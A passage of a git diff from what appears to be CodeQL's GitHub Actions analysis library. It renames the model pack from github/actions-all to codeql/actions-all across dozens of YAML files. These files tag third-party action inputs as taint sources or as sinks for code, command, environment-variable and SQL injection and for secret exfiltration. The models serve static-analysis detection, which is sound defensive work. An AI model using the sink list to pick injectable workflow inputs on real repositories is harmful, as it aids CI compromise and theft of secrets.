"input.needs_context", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/zitadel_zitadel.model.yml b/ql/lib/ext/generated/reusable-workflows/zitadel_zitadel.model.yml index 8d68efb9247e..26ff1b8d07c4 100644 --- a/ql/lib/ext/generated/reusable-workflows/zitadel_zitadel.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/zitadel_zitadel.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["zitadel/zitadel/.github/workflows/release.yml", "*", "input.image_name", "code-injection", "generated"] @@ -8,7 +8,7 @@ extensions: - ["zitadel/zitadel/.github/workflows/container.yml", "*", "input.build_image_name", "code-injection", "generated"] - ["zitadel/zitadel/.github/workflows/compile.yml", "*", "input.version", "code-injection", "generated"] - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["zitadel/zitadel/.github/workflows/container.yml", "*", "input.build_image_name", "output.build_image", "taint", "manual"] diff --git a/ql/lib/ext/manual/8398a7_action-slack.model.yml b/ql/lib/ext/manual/8398a7_action-slack.model.yml index 5687a9729fca..62ffad944930 100644 --- a/ql/lib/ext/manual/8398a7_action-slack.model.yml +++ b/ql/lib/ext/manual/8398a7_action-slack.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["8398a7/action-slack", "*", "input.custom_payload", "code-injection", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/manual/AsasInnab_regex-action.model.yml b/ql/lib/ext/manual/AsasInnab_regex-action.model.yml index 2efaefb95b62..d09b5bf0085e 100644 --- a/ql/lib/ext/manual/AsasInnab_regex-action.model.yml +++ b/ql/lib/ext/manual/AsasInnab_regex-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["AsasInnab/regex-action", "*", "input.search_string", "output.first_match", "taint", "manual"] diff --git a/ql/lib/ext/manual/MeilCli_regex-match.model.yml b/ql/lib/ext/manual/MeilCli_regex-match.model.yml index 74a0f43fd91c..45a4441e5ca9 100644 --- a/ql/lib/ext/manual/MeilCli_regex-match.model.yml +++ b/ql/lib/ext/manual/MeilCli_regex-match.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["MeilCli/regex-match", "*", "input.search_string", "output.matched_first", "taint", "manual"] diff --git a/ql/lib/ext/manual/SonarSource_sonarcloud-github-action.model.yml b/ql/lib/ext/manual/SonarSource_sonarcloud-github-action.model.yml index 87620afac709..2f38a2588679 100644 --- a/ql/lib/ext/manual/SonarSource_sonarcloud-github-action.model.yml +++ b/ql/lib/ext/manual/SonarSource_sonarcloud-github-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["SonarSource/sonarcloud-github-action", "*", "input.args", "secret-exfiltration", "manual"] diff --git a/ql/lib/ext/manual/Steph0_dotenv-configserver.model.yml b/ql/lib/ext/manual/Steph0_dotenv-configserver.model.yml index ad7fb8a538cc..ba894b157329 100644 --- a/ql/lib/ext/manual/Steph0_dotenv-configserver.model.yml +++ b/ql/lib/ext/manual/Steph0_dotenv-configserver.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["Steph0/dotenv-configserver", "*", "input.repository", "envvar-injection", "manual"] diff --git a/ql/lib/ext/manual/WyriHaximus_github-action-files-in-commit.model.yml b/ql/lib/ext/manual/WyriHaximus_github-action-files-in-commit.model.yml index e2009c888518..a29b008f6c2c 100644 --- a/ql/lib/ext/manual/WyriHaximus_github-action-files-in-commit.model.yml +++ b/ql/lib/ext/manual/WyriHaximus_github-action-files-in-commit.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSourceModel data: # https://github.com/WyriHaximus/github-action-files-in-commit diff --git a/ql/lib/ext/manual/aarcangeli_load-dotenv.model.yml b/ql/lib/ext/manual/aarcangeli_load-dotenv.model.yml index cf23452f7a99..045e1177ae20 100644 --- a/ql/lib/ext/manual/aarcangeli_load-dotenv.model.yml +++ b/ql/lib/ext/manual/aarcangeli_load-dotenv.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["aarcangeli/load-dotenv", "*", "artifact", "envvar-injection", "manual"] diff --git a/ql/lib/ext/manual/ab185508_file-type-finder.model.yml b/ql/lib/ext/manual/ab185508_file-type-finder.model.yml index 119b4b1d814b..011f078ff688 100644 --- a/ql/lib/ext/manual/ab185508_file-type-finder.model.yml +++ b/ql/lib/ext/manual/ab185508_file-type-finder.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSourceModel data: # https://github.com/ab185508/file-type-finder diff --git a/ql/lib/ext/manual/actions-ecosystem_action-regex-match.model.yml b/ql/lib/ext/manual/actions-ecosystem_action-regex-match.model.yml index edc9585b5481..ea86e6f5ec7a 100644 --- a/ql/lib/ext/manual/actions-ecosystem_action-regex-match.model.yml +++ b/ql/lib/ext/manual/actions-ecosystem_action-regex-match.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["actions-ecosystem/action-regex-match", "*", "input.text", "output.*", "taint", "manual"] diff --git a/ql/lib/ext/manual/actions_github-script.model.yml b/ql/lib/ext/manual/actions_github-script.model.yml index f02d8f5b180a..3033719bc3b5 100644 --- a/ql/lib/ext/manual/actions_github-script.model.yml +++ b/ql/lib/ext/manual/actions_github-script.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["actions/github-script", "*", "input.script", "code-injection", "manual"] diff --git a/ql/lib/ext/manual/ahmadnassri_action-changed-files.model.yml b/ql/lib/ext/manual/ahmadnassri_action-changed-files.model.yml index 77df62717b0d..f245519a061c 100644 --- a/ql/lib/ext/manual/ahmadnassri_action-changed-files.model.yml +++ b/ql/lib/ext/manual/ahmadnassri_action-changed-files.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSourceModel data: - ["ahmadnassri/action-changed-files", "*", "output.files", "filename", "manual"] diff --git a/ql/lib/ext/manual/akefirad_loadenv-action.model.yml b/ql/lib/ext/manual/akefirad_loadenv-action.model.yml index 8f14138168c7..0116f070183f 100644 --- a/ql/lib/ext/manual/akefirad_loadenv-action.model.yml +++ b/ql/lib/ext/manual/akefirad_loadenv-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["akefirad/loadenv-action", "*", "artifact", "envvar-injection", "manual"] diff --git a/ql/lib/ext/manual/akhileshns_heroku-deploy.model.yml b/ql/lib/ext/manual/akhileshns_heroku-deploy.model.yml index abdcdd6d6986..c272955c58ef 100644 --- a/ql/lib/ext/manual/akhileshns_heroku-deploy.model.yml +++ b/ql/lib/ext/manual/akhileshns_heroku-deploy.model.yml @@ -1,11 +1,11 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["akhileshns/heroku-deploy", "*", "input.branch", "output.status", "taint", "manual"] - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["akhileshns/heroku-deploy", "*", "input.heroku_app_name", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/alessbell_pull-request-comment-branch.model.yml b/ql/lib/ext/manual/alessbell_pull-request-comment-branch.model.yml index 86ce17a9a9b5..5523b7c50675 100644 --- a/ql/lib/ext/manual/alessbell_pull-request-comment-branch.model.yml +++ b/ql/lib/ext/manual/alessbell_pull-request-comment-branch.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSourceModel data: - ["alessbell/pull-request-comment-branch", "*", "output.head_ref", "branch", "manual"] diff --git a/ql/lib/ext/manual/amannn_action-semantic-pull-request.model.yml b/ql/lib/ext/manual/amannn_action-semantic-pull-request.model.yml index ecfdbfb98a0b..8d49c5436e62 100644 --- a/ql/lib/ext/manual/amannn_action-semantic-pull-request.model.yml +++ b/ql/lib/ext/manual/amannn_action-semantic-pull-request.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSourceModel data: - ["amannn/action-semantic-pull-request", "*", "output.error_message", "text", "manual"] diff --git a/ql/lib/ext/manual/anchore_sbom-action.model.yml b/ql/lib/ext/manual/anchore_sbom-action.model.yml index ea7ab3125284..d607aee0514a 100644 --- a/ql/lib/ext/manual/anchore_sbom-action.model.yml +++ b/ql/lib/ext/manual/anchore_sbom-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["anchore/sbom-action", "*", "input.syft-version", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/anchore_scan-action.model.yml b/ql/lib/ext/manual/anchore_scan-action.model.yml index 21ea405b32c5..93bfef222696 100644 --- a/ql/lib/ext/manual/anchore_scan-action.model.yml +++ b/ql/lib/ext/manual/anchore_scan-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["anchore/scan-action", "*", "input.grype-version", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/andresz1_size-limit-action.model.yml b/ql/lib/ext/manual/andresz1_size-limit-action.model.yml index 1e95a8c02736..84500597ce23 100644 --- a/ql/lib/ext/manual/andresz1_size-limit-action.model.yml +++ b/ql/lib/ext/manual/andresz1_size-limit-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["andresz1/size-limit-action", "*", "input.package_manager", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/android-actions_setup-android.model.yml b/ql/lib/ext/manual/android-actions_setup-android.model.yml index 1ecba6ef1a18..3db7aa5db2cd 100644 --- a/ql/lib/ext/manual/android-actions_setup-android.model.yml +++ b/ql/lib/ext/manual/android-actions_setup-android.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["android-actions/setup-android", "*", "input.cmdline-tools-version", "output.ANDROID_COMMANDLINE_TOOLS_VERSION", "taint", "manual"] diff --git a/ql/lib/ext/manual/ankitjain28may_list-files-in-pr.model.yml b/ql/lib/ext/manual/ankitjain28may_list-files-in-pr.model.yml index e3c9297cf233..ac01c86d5874 100644 --- a/ql/lib/ext/manual/ankitjain28may_list-files-in-pr.model.yml +++ b/ql/lib/ext/manual/ankitjain28may_list-files-in-pr.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSourceModel data: # https://github.com/ankitjain28may/list-files-in-pr diff --git a/ql/lib/ext/manual/apple-actions_import-codesign-certs.model.yml b/ql/lib/ext/manual/apple-actions_import-codesign-certs.model.yml index 5d7cb6e0b916..47411f7342ad 100644 --- a/ql/lib/ext/manual/apple-actions_import-codesign-certs.model.yml +++ b/ql/lib/ext/manual/apple-actions_import-codesign-certs.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["apple-actions/import-codesign-certs", "*", "input.keychain-password", "output.keychain-password", "taint", "manual"] diff --git a/ql/lib/ext/manual/appleboy_ssh-action.model.yml b/ql/lib/ext/manual/appleboy_ssh-action.model.yml index c489f8edc85c..087045d86b4a 100644 --- a/ql/lib/ext/manual/appleboy_ssh-action.model.yml +++ b/ql/lib/ext/manual/appleboy_ssh-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["appleboy/ssh-action", "*", "input.script", "code-injection", "manual"] diff --git a/ql/lib/ext/manual/asdf-vm_actions.model.yml b/ql/lib/ext/manual/asdf-vm_actions.model.yml index 26b2e2eb693a..29276b6fdd48 100644 --- a/ql/lib/ext/manual/asdf-vm_actions.model.yml +++ b/ql/lib/ext/manual/asdf-vm_actions.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["asdf-vm/actions", "*", "input.before_install", "command-injection", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/manual/ashley-taylor_read-json-property-action.model.yml b/ql/lib/ext/manual/ashley-taylor_read-json-property-action.model.yml index 99324837e759..db6c52b33fd2 100644 --- a/ql/lib/ext/manual/ashley-taylor_read-json-property-action.model.yml +++ b/ql/lib/ext/manual/ashley-taylor_read-json-property-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["ashley-taylor/read-json-property-action", "*", "input.json", "output.value", "taint", "manual"] diff --git a/ql/lib/ext/manual/ashley-taylor_regex-property-action.model.yml b/ql/lib/ext/manual/ashley-taylor_regex-property-action.model.yml index cd827ffc2f87..d20d698c40d6 100644 --- a/ql/lib/ext/manual/ashley-taylor_regex-property-action.model.yml +++ b/ql/lib/ext/manual/ashley-taylor_regex-property-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["ashley-taylor/regex-property-action", "*", "input.replacement", "output.value", "taint", "manual"] diff --git a/ql/lib/ext/manual/aszc_change-string-case-action.model.yml b/ql/lib/ext/manual/aszc_change-string-case-action.model.yml index 64abc03a5fb3..f0e4e6e31b19 100644 --- a/ql/lib/ext/manual/aszc_change-string-case-action.model.yml +++ b/ql/lib/ext/manual/aszc_change-string-case-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["aszc/change-string-case-action", "*", "input.string", "output.capitalized", "taint", "manual"] diff --git a/ql/lib/ext/manual/avraamMavridis_files-changed-action.model.yml b/ql/lib/ext/manual/avraamMavridis_files-changed-action.model.yml index c14bc95c013d..b15eff553369 100644 --- a/ql/lib/ext/manual/avraamMavridis_files-changed-action.model.yml +++ b/ql/lib/ext/manual/avraamMavridis_files-changed-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSourceModel data: # https://github.com/AvraamMavridis/files-changed-action diff --git a/ql/lib/ext/manual/aws-actions_configure-aws-credentials.model.yml b/ql/lib/ext/manual/aws-actions_configure-aws-credentials.model.yml index 63eb8b21249d..f17f3c788b3b 100644 --- a/ql/lib/ext/manual/aws-actions_configure-aws-credentials.model.yml +++ b/ql/lib/ext/manual/aws-actions_configure-aws-credentials.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["aws-actions/configure-aws-credentials", "*", "input.aws-access-key-id", "env.AWS_ACCESS_KEY_ID", "taint", "manual"] diff --git a/ql/lib/ext/manual/axel-op_googlejavaformat-action.model.yml b/ql/lib/ext/manual/axel-op_googlejavaformat-action.model.yml index 170ceb2f95cb..ccdb64fd3f32 100644 --- a/ql/lib/ext/manual/axel-op_googlejavaformat-action.model.yml +++ b/ql/lib/ext/manual/axel-op_googlejavaformat-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["axel-op/googlejavaformat-action", "*", "input.commitMessage", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/azure_cli.model.yml b/ql/lib/ext/manual/azure_cli.model.yml index dcf1de044aaf..588c17bc76a4 100644 --- a/ql/lib/ext/manual/azure_cli.model.yml +++ b/ql/lib/ext/manual/azure_cli.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["azure/cli", "*", "input.inlineScript", "code-injection", "manual"] diff --git a/ql/lib/ext/manual/azure_powershell.model.yml b/ql/lib/ext/manual/azure_powershell.model.yml index a2d08f93928a..901c4cf461e0 100644 --- a/ql/lib/ext/manual/azure_powershell.model.yml +++ b/ql/lib/ext/manual/azure_powershell.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["azure/powershell", "*", "input.inlineScript", "code-injection", "manual"] diff --git a/ql/lib/ext/manual/bahmutov_npm-install.model.yml b/ql/lib/ext/manual/bahmutov_npm-install.model.yml index 7d646dece692..8db78b6e9a8b 100644 --- a/ql/lib/ext/manual/bahmutov_npm-install.model.yml +++ b/ql/lib/ext/manual/bahmutov_npm-install.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["bahmutov/npm-install", "*", "input.install-command", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/blackducksoftware_github-action.model.yml b/ql/lib/ext/manual/blackducksoftware_github-action.model.yml index fb03722c16ad..20a06102bbdb 100644 --- a/ql/lib/ext/manual/blackducksoftware_github-action.model.yml +++ b/ql/lib/ext/manual/blackducksoftware_github-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["blackducksoftware/github-action", "*", "input.args", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/bobheadxi_deployments.model.yml b/ql/lib/ext/manual/bobheadxi_deployments.model.yml index a14748aead07..043610ab3a36 100644 --- a/ql/lib/ext/manual/bobheadxi_deployments.model.yml +++ b/ql/lib/ext/manual/bobheadxi_deployments.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["bobheadxi/deployments", "*", "input.env", "output.env", "taint", "manual"] diff --git a/ql/lib/ext/manual/bufbuild_buf-breaking-action.model.yml b/ql/lib/ext/manual/bufbuild_buf-breaking-action.model.yml index 4caf23c8812f..037b67993f3e 100644 --- a/ql/lib/ext/manual/bufbuild_buf-breaking-action.model.yml +++ b/ql/lib/ext/manual/bufbuild_buf-breaking-action.model.yml @@ -1,11 +1,11 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["bufbuild/buf-breaking-action", "*", "input.buf_token", "env.BUF_TOKEN", "taint", "manual"] - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["bufbuild/buf-breaking-action", "*", "input.input", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/bufbuild_buf-lint-action.model.yml b/ql/lib/ext/manual/bufbuild_buf-lint-action.model.yml index 1fa66b8ceb64..7483849b916e 100644 --- a/ql/lib/ext/manual/bufbuild_buf-lint-action.model.yml +++ b/ql/lib/ext/manual/bufbuild_buf-lint-action.model.yml @@ -1,11 +1,11 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["bufbuild/buf-lint-action", "*", "input.buf_token", "env.BUF_TOKEN", "taint", "manual"] - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["bufbuild/buf-lint-action", "*", "input.input", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/bufbuild_buf-setup-action.model.yml b/ql/lib/ext/manual/bufbuild_buf-setup-action.model.yml index f2fed75539b4..8f5a15aa1e92 100644 --- a/ql/lib/ext/manual/bufbuild_buf-setup-action.model.yml +++ b/ql/lib/ext/manual/bufbuild_buf-setup-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["bufbuild/buf-setup-action", "*", "input.buf_domain", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/c-py_action-dotenv-to-setenv.model.yml b/ql/lib/ext/manual/c-py_action-dotenv-to-setenv.model.yml index 264c3f7b2424..f18fd14a4a61 100644 --- a/ql/lib/ext/manual/c-py_action-dotenv-to-setenv.model.yml +++ b/ql/lib/ext/manual/c-py_action-dotenv-to-setenv.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["c-py/action-dotenv-to-setenv", "*", "artifact", "envvar-injection", "manual"] diff --git a/ql/lib/ext/manual/cachix_cachix-action.model.yml b/ql/lib/ext/manual/cachix_cachix-action.model.yml index dfaffaf87deb..f3eabe2c17d7 100644 --- a/ql/lib/ext/manual/cachix_cachix-action.model.yml +++ b/ql/lib/ext/manual/cachix_cachix-action.model.yml @@ -1,11 +1,11 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["cachix/cachix-action", "*", "input.signingKey", "env.CACHIX_SIGNING_KEY", "taint", "manual"] - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["cachix/cachix-action", "*", "input.installCommand", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/changesets_action.model.yml b/ql/lib/ext/manual/changesets_action.model.yml index 7bab09bca76d..e1b34c67d492 100644 --- a/ql/lib/ext/manual/changesets_action.model.yml +++ b/ql/lib/ext/manual/changesets_action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["changesets/action", "*", "input.publish", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/cloudflare_wrangler-action.model.yml b/ql/lib/ext/manual/cloudflare_wrangler-action.model.yml index 86759ad40d5c..9f212f145f6a 100644 --- a/ql/lib/ext/manual/cloudflare_wrangler-action.model.yml +++ b/ql/lib/ext/manual/cloudflare_wrangler-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["cloudflare/wrangler-action", "*", "input.preCommands", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/cosq-network_dotenv-loader.model.yml b/ql/lib/ext/manual/cosq-network_dotenv-loader.model.yml index f00774d1c4ad..49a399355443 100644 --- a/ql/lib/ext/manual/cosq-network_dotenv-loader.model.yml +++ b/ql/lib/ext/manual/cosq-network_dotenv-loader.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["cosq-network/dotenv-loader", "*", "artifact", "envvar-injection", "manual"] diff --git a/ql/lib/ext/manual/coursier_cache-action.model.yml b/ql/lib/ext/manual/coursier_cache-action.model.yml index 65474ba343d6..319f712a9bf1 100644 --- a/ql/lib/ext/manual/coursier_cache-action.model.yml +++ b/ql/lib/ext/manual/coursier_cache-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["coursier/cache-action", "*", "input.path", "env.COURSIER_CACHE", "taint", "manual"] diff --git a/ql/lib/ext/manual/crazy-max_ghaction-chocolatey.model.yml b/ql/lib/ext/manual/crazy-max_ghaction-chocolatey.model.yml index e3dd557084b6..772a5d59e188 100644 --- a/ql/lib/ext/manual/crazy-max_ghaction-chocolatey.model.yml +++ b/ql/lib/ext/manual/crazy-max_ghaction-chocolatey.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["crazy-max/ghaction-chocolatey", "*", "input.args", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/crazy-max_ghaction-import-gpg.model.yml b/ql/lib/ext/manual/crazy-max_ghaction-import-gpg.model.yml index f3cb32b612ff..3d1366558fe0 100644 --- a/ql/lib/ext/manual/crazy-max_ghaction-import-gpg.model.yml +++ b/ql/lib/ext/manual/crazy-max_ghaction-import-gpg.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["crazy-max/ghaction-import-gpg", "*", "input.fingerprint", "output.fingerprint", "taint", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/manual/csexton_release-asset-action.model.yml b/ql/lib/ext/manual/csexton_release-asset-action.model.yml index 639ee965f42e..3da214d62feb 100644 --- a/ql/lib/ext/manual/csexton_release-asset-action.model.yml +++ b/ql/lib/ext/manual/csexton_release-asset-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["csexton/release-asset-action", "*", "input.release-url", "output.url", "taint", "manual"] diff --git a/ql/lib/ext/manual/cycjimmy_semantic-release-action.model.yml b/ql/lib/ext/manual/cycjimmy_semantic-release-action.model.yml index 40d03569c8d5..37c6af1f99e1 100644 --- a/ql/lib/ext/manual/cycjimmy_semantic-release-action.model.yml +++ b/ql/lib/ext/manual/cycjimmy_semantic-release-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["cycjimmy/semantic-release-action", "*", "input.semantic_version", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/cypress-io_github-action.model.yml b/ql/lib/ext/manual/cypress-io_github-action.model.yml index ed20a5623750..fecc9e5ce055 100644 --- a/ql/lib/ext/manual/cypress-io_github-action.model.yml +++ b/ql/lib/ext/manual/cypress-io_github-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSourceModel data: - ["cypress-io/github-action", "*", "env.GH_BRANCH", "branch", "manual"] diff --git a/ql/lib/ext/manual/dailydotdev_action-devcard.model.yml b/ql/lib/ext/manual/dailydotdev_action-devcard.model.yml index 22725484ea46..34eac65cdc8c 100644 --- a/ql/lib/ext/manual/dailydotdev_action-devcard.model.yml +++ b/ql/lib/ext/manual/dailydotdev_action-devcard.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["dailydotdev/action-devcard", "*", "input.commit_branch", "sql-injection", "manual"] diff --git a/ql/lib/ext/manual/danielpalme_reportgenerator-github-action.model.yml b/ql/lib/ext/manual/danielpalme_reportgenerator-github-action.model.yml index d7839211e20d..ba5de3c24706 100644 --- a/ql/lib/ext/manual/danielpalme_reportgenerator-github-action.model.yml +++ b/ql/lib/ext/manual/danielpalme_reportgenerator-github-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["danielpalme/reportgenerator-github-action", "*", "input.toolpath", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/daspn_private-actions-checkout.model.yml b/ql/lib/ext/manual/daspn_private-actions-checkout.model.yml index 3ff92757361b..27a8ffae1857 100644 --- a/ql/lib/ext/manual/daspn_private-actions-checkout.model.yml +++ b/ql/lib/ext/manual/daspn_private-actions-checkout.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["daspn/private-actions-checkout", "*", "input.actions_list", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/dawidd6_action-ansible-playbook.model.yml b/ql/lib/ext/manual/dawidd6_action-ansible-playbook.model.yml index 2e41b4f8eb5b..b87f18629996 100644 --- a/ql/lib/ext/manual/dawidd6_action-ansible-playbook.model.yml +++ b/ql/lib/ext/manual/dawidd6_action-ansible-playbook.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["dawidd6/action-ansible-playbook", "*", "input.playbook", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/dawidd6_action-download-artifact.model.yml b/ql/lib/ext/manual/dawidd6_action-download-artifact.model.yml index 62ff29bc9f0c..7ead429278e5 100644 --- a/ql/lib/ext/manual/dawidd6_action-download-artifact.model.yml +++ b/ql/lib/ext/manual/dawidd6_action-download-artifact.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSourceModel data: - ["dawidd6/action-download-artifact", "*", "output.artifacts", "artifact", "manual"] diff --git a/ql/lib/ext/manual/delaguardo_setup-clojure.model.yml b/ql/lib/ext/manual/delaguardo_setup-clojure.model.yml index af4e15da03b0..6b900caef361 100644 --- a/ql/lib/ext/manual/delaguardo_setup-clojure.model.yml +++ b/ql/lib/ext/manual/delaguardo_setup-clojure.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["delaguardo/setup-clojure", "*", "input.boot", "env.BOOT_VERSION", "taint", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/manual/determinatesystems_magic-nix-cache-action.model.yml b/ql/lib/ext/manual/determinatesystems_magic-nix-cache-action.model.yml index 2dbf47187144..cafdfada61ba 100644 --- a/ql/lib/ext/manual/determinatesystems_magic-nix-cache-action.model.yml +++ b/ql/lib/ext/manual/determinatesystems_magic-nix-cache-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["determinatesystems/magic-nix-cache-action", "*", 